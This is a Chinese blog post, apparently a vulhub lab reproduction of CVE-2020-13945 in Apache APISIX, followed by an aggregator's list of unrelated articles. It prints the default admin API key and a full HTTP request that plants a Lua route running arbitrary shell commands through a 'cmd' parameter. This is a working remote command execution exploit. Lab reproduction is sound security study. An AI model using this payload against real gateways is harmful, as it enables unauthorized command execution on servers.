vulhub中Apache APISIX 默认密钥漏洞复现（CVE-2020-13945）

vulhub中Apache APISIX 默认密钥漏洞复现（CVE-2020-13945）

news2024/9/17 7:17:31

Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下，Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`，攻击者利用这个Token可以访问到管理员接口，进而通过`script`参数来插入任意LUA脚本并执行。

1.利用默认Token增加一个恶意的router，其中包含恶意LUA脚本：

POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406

{
    "uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
    "upstream": {
        "type": "roundrobin",
        "nodes": {
            "example.com:80": 1
        }
    }
}

2.然后，我们访问刚才添加的router，就可以通过cmd参数执行任意命令：

http://your-ip:9080/attack?cmd=id

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1431968.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

110.乐理基础-五线谱-五线谱的速度

110.乐理基础-五线谱-五线谱的速度

内容参考于：三分钟音乐社上一个内容：五线谱的附点、休止符、连线、延音线-CSDN博客上一个内容里练习的答案： 五线谱里的情绪与速度也是跟简谱里一样，详情看：音乐的速度专栏里的内容，根据创建时间&…

阅读更多...

CNN应用Keras Tuner寻找最佳Hidden Layers层数和神经元数量

CNN应用Keras Tuner寻找最佳Hidden Layers层数和神经元数量

介绍： Keras Tuner是一种用于优化Keras模型超参数的开源Python库。它允许您通过自动化搜索算法来寻找最佳的超参数组合，以提高模型的性能。Keras Tuner提供了一系列内置的超参数搜索算法，如随机搜索、网格搜索、贝叶斯优化等。它还支持自定义…

阅读更多...

《Python 网络爬虫简易速速上手小册》第2章：网络爬虫准备工作（2024 最新版）

《Python 网络爬虫简易速速上手小册》第2章：网络爬虫准备工作（2024 最新版）

文章目录 2.1 选择合适的爬虫工具和库2.1.1 重点基础知识讲解2.1.2 重点案例：使用 Scrapy 抓取电商网站2.1.3 拓展案例 1：使用 Requests 和 BeautifulSoup 抓取博客文章2.1.4 拓展案例 2：使用 Selenium 抓取动态内容 2.2 设置开发环境2.2.1 重…

阅读更多...

计算机毕业设计 | vue+SpringBoot图书借阅管理系统(附源码)

计算机毕业设计 | vue+SpringBoot图书借阅管理系统(附源码)

1， 概述 1.1 课题背景随着现在科学技术的进步，人类社会正逐渐走向信息化，图书馆拥有丰富的文献信息资源，是社会系统的重要组成部分，在信息社会中作用越来越重要，在我国图书馆计算机等信息技术的应用起步…

阅读更多...

【Linux】文件重定向与实现支持文件重定向的minishell

【Linux】文件重定向与实现支持文件重定向的minishell

目录 0.前提编辑 1.重定向 1.1重定向的本质 1.2dup2 1.3模拟实现输出重定向 > 1.4模拟实现追加重定向 >> 1.5模拟实现输入重定向 < 2.让minishell支持重定向 0.前提文件描述符的分配规则： 在文件描述符表里面，从小到大按照顺…

阅读更多...

linux中的mtime，ctime，atime

linux中的mtime，ctime，atime

目录结论文件 touch新文件调整文件内容 echo直接修改 vi修改修改文件属性调整归属调整权限读取文件目录增加文件调整目录下文件属性访问目录下文件删除文件结论 mtime：文件内容的修改时间（不含权限、属组修改） …

阅读更多...

计算机网络-封装成帧透明传输（组帧方法）

计算机网络-封装成帧透明传输（组帧方法）

文章目录数据链路层功能概述封装成帧透明传输组帧方法字符计数法字符填充法零比特填充法违规编码法字符填充法为啥复杂和不兼容数据链路层功能概述类似老板让小秘书送文件给别的公司，小秘书告诉傻子怎么把该文件送到别的公司的小秘书，然后别的公司的…

阅读更多...

基于springboot就业信息管理系统源码和论文

基于springboot就业信息管理系统源码和论文

随着信息化时代的到来，管理系统都趋向于智能化、系统化，就业信息管理系统也不例外，但目前国内仍都使用人工管理，市场规模越来越大，同时信息量也越来越庞大，人工管理显然已无法应对时代的变化，而…

阅读更多...

挑战杯 python 机器视觉车牌识别 - opencv 深度学习机器学习

挑战杯 python 机器视觉车牌识别 - opencv 深度学习机器学习

1 前言 🔥 优质竞赛项目系列，今天要分享的是 🚩 基于python 机器视觉的车牌识别系统 🥇学长这里给一个题目综合评分(每项满分5分) 难度系数：3分工作量：3分创新点：3分 🧿 更多资…

阅读更多...

【王者荣耀】：背后的技术之谜，揭秘游戏背后的实现奥秘！

【王者荣耀】：背后的技术之谜，揭秘游戏背后的实现奥秘！

目录 1、引言 2、游戏引擎 3、网络技术 4、图形渲染 5、操作控制 6、AI算法 7、数据管理 8、安全防护 9、优化与性能 10、未来发展 11、结语 1、引言随着智能手机的普及和移动互联网的发展，手机游戏已经成为人们日常娱乐的重要组成部分。而在众多手机游…

阅读更多...

Oracle Server一台价值百万的服务器内存更换过程

Oracle Server一台价值百万的服务器内存更换过程

数据库代码敲多了，看乏了吧！ 带各位DBA看看你们的数据库运行在什么样的硬件上。 1、故障现象事发时2号位置报警登录ILO发现内存报警查看详细信息查看详细报警 2、关于ORACLE 服务器DIMM 备用默认情况下在 Oracle ILOM 中启用 DIMM 备用。由 DIMM 提…

阅读更多...

MySQL的原生API实现插入数据后在可视化工具上不显示的问题解决

MySQL的原生API实现插入数据后在可视化工具上不显示的问题解决

显示表中有两行数据，该表也设置了主键和唯一索引点进表里看却没有数据问题原因出现在这里，虽然很多常用的数据库连接池都会开启自动提交，但ibatis的SqlSession使用sessionFactory.openSession()创建时，默认的自动提交是false&am…

阅读更多...

vcruntime140.dll最新的修复方法，一键修复vcruntime140.dll的手段

vcruntime140.dll最新的修复方法，一键修复vcruntime140.dll的手段

在这篇文章中，我们将深入探讨并详细介绍各种修复vcruntime140.dll文件缺失或损坏问题的方法。鉴于此类问题广泛存在并影响了众多用户，本文目的是向大家展示不同的修复策略，希望能够帮助每个人解决这些棘手的技术难题。下面一起来看看vcruntim…

阅读更多...

02-单例模式 ( Singleton Pattern )

02-单例模式 ( Singleton Pattern )

单例模式单例模式设计要点单例模式基础实现摘要实现范例单例模式的几种实现方式1. 懒汉式，线程不安全2. 懒汉式，线程安全3. 饿汉式4. 双检锁/双重校验锁（DCL，即 double-checked locking）5. 登记式/静态内部类6. 枚举…

阅读更多...

更新npm镜像源：淘宝镜像已过期，及时切换！

更新npm镜像源：淘宝镜像已过期，及时切换！

你好，我是小白Coding日志，一个热爱技术的程序员。在这里，我分享自己在编程和技术世界中的学习心得和体会。希望我的文章能够给你带来一些灵感和帮助。欢迎来到我的博客，一起在技术的世界里探索前行吧！ 前言就在昨天…

阅读更多...

使用PHPStudy搭建Cloudreve网盘服务

使用PHPStudy搭建Cloudreve网盘服务

文章目录 1、前言2、本地网站搭建2.1 环境使用2.2 支持组件选择2.3 网页安装2.4 测试和使用2.5 问题解决 3、本地网页发布3.1 cpolar云端设置3.2 cpolar本地设置 4、公网访问测试5、结语 1、前言自云存储概念兴起已经有段时间了，各互联网大厂也纷纷加入战局&#…

阅读更多...

$【2024.2.4练习】国王游戏$

【2024.2.4练习】国王游戏

题目描述题目思路涉及排列组合求最优解问题，数据大考虑是否满足某种贪心策略。假设不除以右手的数字，那么获得金币数量最多的显然为最后一个人。左手数字最大的应排在最后一位。在右手有数字的情况下，不妨也尝试从最后一个人开始排。假…

阅读更多...

Python---Pycharm安装各种库（第三方库）

Python---Pycharm安装各种库（第三方库）

一、前言 Pycharm中，通常需要安装很多第三方库，才可以使用相应的拓展功能，这篇文档给你介绍Pycharm中的常用库，以及安装的两种方法!二、Pycharm常用库的介绍 Pycharm是一款非常流行的Python集成开发环境（IDE&#xff…

阅读更多...

VSCODE使用ssh远程连接时启动服务器失败问题

VSCODE使用ssh远程连接时启动服务器失败问题

错误情况 ping服务器的ip可通并且使用terminal可以ssh连接到远程服务器。但使用vscode的remote-ssh时，在「输出」栏出现了一直报 Waiting for server log… 的情况！ 解决方法一重置服务器设置，包括以下手段： 1.清理服务器端的…

阅读更多...

RV1126 ext4 img格式的文件系统制作

RV1126 ext4 img格式的文件系统制作

（1）制作镜像文件,用dd工具创建12G大小空的镜像文件 dd if/dev/zero ofmedia.img bs512 count25165824#bs512表示每块读写512字节的数据#count25165824表示拷贝25165824次 （2）可以查看制作的镜像 hexdump -C media.img ll media…

阅读更多...

推荐文章

最新文章